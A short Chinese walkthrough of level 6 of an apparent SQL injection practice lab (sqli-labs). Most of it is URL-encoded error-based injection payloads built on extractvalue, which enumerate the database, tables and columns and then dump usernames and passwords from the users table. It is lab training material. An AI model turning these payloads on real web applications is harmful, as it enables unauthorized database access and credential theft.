1.第六关了。

 

 2.这个和第五关有点像，只是换成了双引号，接下来的都一样，看我操作(换个函数试一下extractvalue，他的报错位置在第二个，那我就利用一下)

3.爆库名 

?id=1"%20and%20extractvalue(1,concat(0x7e,(select%20database()),0x7e))--+ 

4.爆表名 

?id=1"%20and%20extractvalue(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema="security"),0x7e))--+

5.爆列名 

?id=1"%20and%20extractvalue(1,concat(0x7e,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema="security"%20and%20table_name="users"),0x7e))--+

6.数据查看 

?id=1"%20and%20extractvalue(1,concat(0x7e,(select%20group_concat(username,0x3a,password)%20from%20users),0x7e))--+

7.字段截取 

?id=1"%20and%20extractvalue(1,concat(0x7e,(select%20substring(group_concat(username,0x3a,password),1,32)%20from%20users),0x7e))--+

/?id=1"%20and%20extractvalue(1,concat(0x7e,(select%20substring(group_concat(username,0x3a,password),32,64)%20from%20users),0x7e))--+

这样就拿到第六关的数据了